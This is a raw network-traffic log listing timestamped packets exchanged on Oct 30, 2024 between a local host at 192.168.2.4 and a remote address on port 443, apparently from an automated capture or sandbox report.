Oct 30, 2024 19:47:19.459810019 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.463917017 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.463932037 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.463984966 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.463992119 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.464034081 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.464063883 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.464081049 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.464128971 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.464135885 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.464176893 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.464190960 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.464205980 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.464241028 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.464246988 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.464268923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.464288950 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.464329958 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.464344978 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.464395046 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.464401960 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.464445114 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.493016005 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.493053913 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.493205070 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.493205070 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.493218899 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.493516922 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.493544102 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.493557930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.493614912 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.493623018 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.493663073 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.573036909 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.573060989 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.573236942 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.573263884 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.573313951 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.576095104 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.576107979 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.576165915 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.576174021 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.576215982 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.576494932 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.576508999 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.576560974 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.576567888 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.576607943 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.576834917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.576848030 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.576900005 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.576906919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.576945066 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.578110933 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.578125000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.578178883 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.578186035 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.578223944 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.578586102 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.578603029 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.578659058 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.578665972 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.578702927 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.578943968 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.578957081 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.579003096 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.579010963 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.579044104 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.579193115 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.579206944 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.579272985 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.579281092 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.579319954 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.580176115 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.580192089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.580244064 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.580250025 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.580286026 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.580518007 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.580530882 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.580579042 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.580585003 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.580630064 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.581033945 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.581049919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.581105947 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.581114054 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.581150055 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.581454992 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.581468105 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.581516027 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.581521988 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.581548929 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.581567049 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.582079887 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.582093000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.582150936 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.582159042 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.582195044 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.582385063 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.582400084 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.582444906 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.582452059 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.582489014 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.582797050 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.582809925 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.582859993 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.582868099 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.582914114 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.583029032 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.583045959 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.583096981 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.583102942 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.583139896 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.583468914 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.583484888 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.583528042 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.583534002 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.583559036 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.583575010 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.583692074 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.583705902 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.583739042 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.583745956 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.583769083 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.583786964 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.585391998 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.585407019 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.585467100 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.585474968 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.585511923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.585648060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.585661888 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.585704088 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.585711956 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.585746050 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.586071968 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.586086035 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.586139917 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.586147070 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.586190939 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.586745024 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.586760044 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.586815119 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.586823940 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.590863943 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.616588116 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.616602898 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.616708994 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.616718054 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.616756916 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.644861937 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.644880056 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.644942999 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.644965887 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.645004034 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.697575092 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.697596073 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.697632074 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.697648048 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.697666883 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.697685003 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.699542046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.699556112 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.699606895 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.699615002 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.699666023 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.700537920 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.700552940 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.700617075 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.700624943 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.700664043 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.700900078 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.700915098 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.700969934 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.700978041 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.701015949 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.701335907 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.701349974 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.701405048 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.701416969 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.701453924 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.701845884 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.701858997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.701913118 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.701920033 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.701953888 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.702457905 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.702471972 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.702512026 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.702517986 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.702542067 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.702560902 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.702729940 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.702747107 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.702795982 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.702804089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.702857971 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.703488111 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.703502893 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.703555107 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.703562021 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.703594923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.703769922 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.703784943 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.703834057 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.703840017 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.703881979 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.704163074 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.704175949 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.704231024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.704240084 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.704274893 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.704602003 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.704627037 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.704674959 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.704682112 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.704726934 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.705717087 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.705732107 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.705785036 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.705794096 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.705830097 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.706062078 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.706078053 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.706127882 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.706134081 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.706175089 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.706496000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.706511021 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.706563950 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.706571102 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.706607103 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.706702948 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.706716061 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.706765890 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.706773043 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.706811905 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.707102060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.707115889 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.707163095 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.707173109 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.707182884 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.707207918 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.707472086 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.707487106 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.707537889 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.707545996 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.707581043 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.708606958 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.708619118 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.708671093 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.708678007 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.708714008 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.708919048 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.708933115 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.708981037 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.708987951 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.709023952 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.709558964 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.709573984 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.709619999 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.709626913 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.709661007 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.709914923 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.709928989 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.709975958 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.709984064 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.710027933 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.710160971 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.710177898 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.710223913 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.710231066 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.710268974 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.740092993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.740107059 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.740211010 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.740225077 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.740272999 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.740495920 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.740511894 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.740564108 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.740571976 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.740612030 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.819876909 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.819897890 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.820053101 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.820064068 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.820122004 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.822913885 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.822931051 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.822992086 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.822999001 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.823035002 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.823816061 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.823831081 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.823880911 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.823889017 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.823925972 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.824239969 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.824253082 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.824305058 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.824310064 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.824353933 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.825016022 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.825031042 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.825086117 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.825093031 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.825129986 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.825349092 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.825367928 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.825412989 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.825419903 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.825459003 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.825748920 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.825762987 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.825805902 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.825813055 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.825850010 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.826286077 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.826301098 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.826351881 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.826358080 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.826392889 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.826564074 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.826577902 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.826626062 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.826633930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.826674938 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.827055931 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.827070951 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.827126026 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.827131987 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.827167034 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.827780008 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.827794075 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.827855110 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.827861071 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.827896118 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.828102112 CET	443	49731	87.106.236.48	192.168.2.4
